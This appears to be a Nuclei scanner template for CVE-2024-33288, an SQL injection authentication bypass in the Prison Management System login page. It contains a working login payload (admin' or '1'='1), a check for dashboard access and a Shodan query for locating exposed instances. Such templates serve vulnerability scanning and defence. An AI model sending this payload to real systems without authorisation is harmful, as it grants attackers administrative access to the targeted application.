46 lines
1.4 KiB
YAML
46 lines
1.4 KiB
YAML
id: CVE-2024-33288
|
|
|
|
info:
|
|
name: Prison Management System - SQL Injection Authentication Bypass
|
|
author: Kazgangap
|
|
severity: high
|
|
description: |
|
|
Sql injection vulnerability was found on the login page in Prison Management System
|
|
reference:
|
|
- https://en.0day.today/exploit/39610
|
|
- https://www.sourcecodester.com/sql/17287/prison-management-system.html
|
|
classification:
|
|
cpe: cpe:2.3:a:prison_management_system_project:prison_management_system:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
vendor: prison_management_system_project
|
|
product: prison_management_system
|
|
shodan-query: title:"Prison Management System"
|
|
tags: cve,cve2024,cms,sqli
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /Admin/login.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
txtusername=admin%27+or+%271%27+%3D%271&txtpassword={{randstr}}&btnlogin=
|
|
- |
|
|
GET /Admin/index.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "<p>Change Password</p>"
|
|
- "<p>Logout</p>"
|
|
- "Admin Dashboard | Prison Management system"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100b5007dc0975838f239f7153a6c305a570b6a6610f2d10274293d908948a7eb8f0220535add225fd5f4190f42e5e1a6926f9174f7566d3c9bd9f150af6d29525d69c7:922c64590222798bb761d5b6d8e72950 |